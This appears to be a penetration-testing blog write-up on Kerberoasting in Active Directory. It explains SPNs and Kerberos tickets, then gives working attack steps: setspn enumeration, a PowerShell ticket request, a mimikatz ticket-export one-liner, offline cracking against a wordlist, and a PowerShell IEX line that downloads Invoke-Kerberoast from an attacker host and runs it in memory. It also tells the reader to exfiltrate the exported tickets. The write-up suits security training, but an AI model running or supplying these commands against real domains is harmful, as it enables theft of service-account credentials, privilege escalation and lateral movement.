ID: T1208 Tactic: Credential Access

Service Principal Names (SPN's) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service)

Adversaries possessing a valid Kerberos ticket granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP type 23 hash of the service account associated with the SPN is used as the private key and thus vulnerable to offline Brute-Force attacks that mat expose plaintext credentials.

This same attack could be executed using service tickets captured from network traffic.

Cracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to Valid Accounts.

Kerberoasting takes advantage of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs). Kerberoasting allows us to crack passwords for these accounts. By logging into an Active Directory domain as any authenticated user, we are able to request service tickets (TGS) for service accounts by specifying their SPN value. Active Directory will return an encrypted ticket, which is encrypted using the NTLM hash of the account that is associated with that SPN. You can then brute force those service tickets until successfully cracked, with no risk of detection or account lockouts. Once cracked, you have the service account password in plain text.

A little about Kerberos:

Kerberos is a network authentication protocol that works with tickets to allow nodes (Computers, Users) to prove their identity over an insecure network.

In a nutshell

  • a protocol for authentication

  • uses tickets to authenticate

  • avoids storing passwords locally or sending them over the internet

  • involves a trusted 3rd-party

  • built on symmetric-key cryptography

Easy way to remember this attack:

  1. Scan Active Directory for user accounts with SPN values set.

  2. Request service tickets from AD using SPN values

  3. Extract service tickets to memory and save to a file

  4. Brute Force attack those passwords offline until cracked

Attack (Mimikatz and Invoke-Kerberoast)


So you gain a foothold on the Network, there are various methods on how to search for SPN but let's work with a few. I only managed to get output from the CMD on the box itself not through a shell

setspn -Q */*

But from here I will be working from Kali Box with an initial Shell.

Script from Kerberoast Toolkit

For this I used powershell to get executed in Memory so i don't save the file to Disk, and view the result's and find 2 accounts available for Kerberoasting. Now I will focus in the SQL Account.

Now we need to request a Ticket this can also be easily done using PowerShell.

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SERVICE PRINCIAL NAME"

The ticket is saved in memory and from here we can continue with the use of Mimikatz, The whole nothing to Disk die's here we can use mimikatz to grab the tickets from memory and export them into a file that we can grab later for Offline Cracking.

Use the mimikatz one-liner since a shell with not let you interact correctly with mimikatz and it will hang, best to show output and exit

mimikatz.exe "kerberos::list /export" exit

This is the file we are interested in:

When this command is run it will save all the tickets into a ".kirbi" file format from here use any Exfiltration Techniques to download to your attacking Box.

Now I will use the from the kerberoast toolkit this will use a dictionary attack onto the kirbi file and try to crack the hashes password. Since I already know the pass I will cut the time by creating a custom wordlist.

python /opt/kerberoast/ "WORDLIST" "FILE.KIRBI"

Even though it is more complicated on how Kerberos works, and this attack itself, this is a small and hopefully good understanding on why Kerberoasting works. Any domain user can request for a ticket on a SPN account, this ticket get's saved in memory, mimikatz can export the files, then some offline cracking. This attack is only as good as your wordlist.


Invoke-Kerberoast this tools will cut our time by half it is a module from the PowerSploit repository it is also found in the Empire Project more info here.

A simple one-liner will get us what we want and turn it into a format perfect for cracking with the hashcat tool.

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('ATTACKIP/Invoke-Kerberoast');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat"

And same result with a quick script to lookup the user account, request for a ticket, saved in memory, grab the hash from here a simple copy paste and we can start cracking offline. Many C2 frameworks can do this automatically but here are some examples used with a standard Shell.

Last updated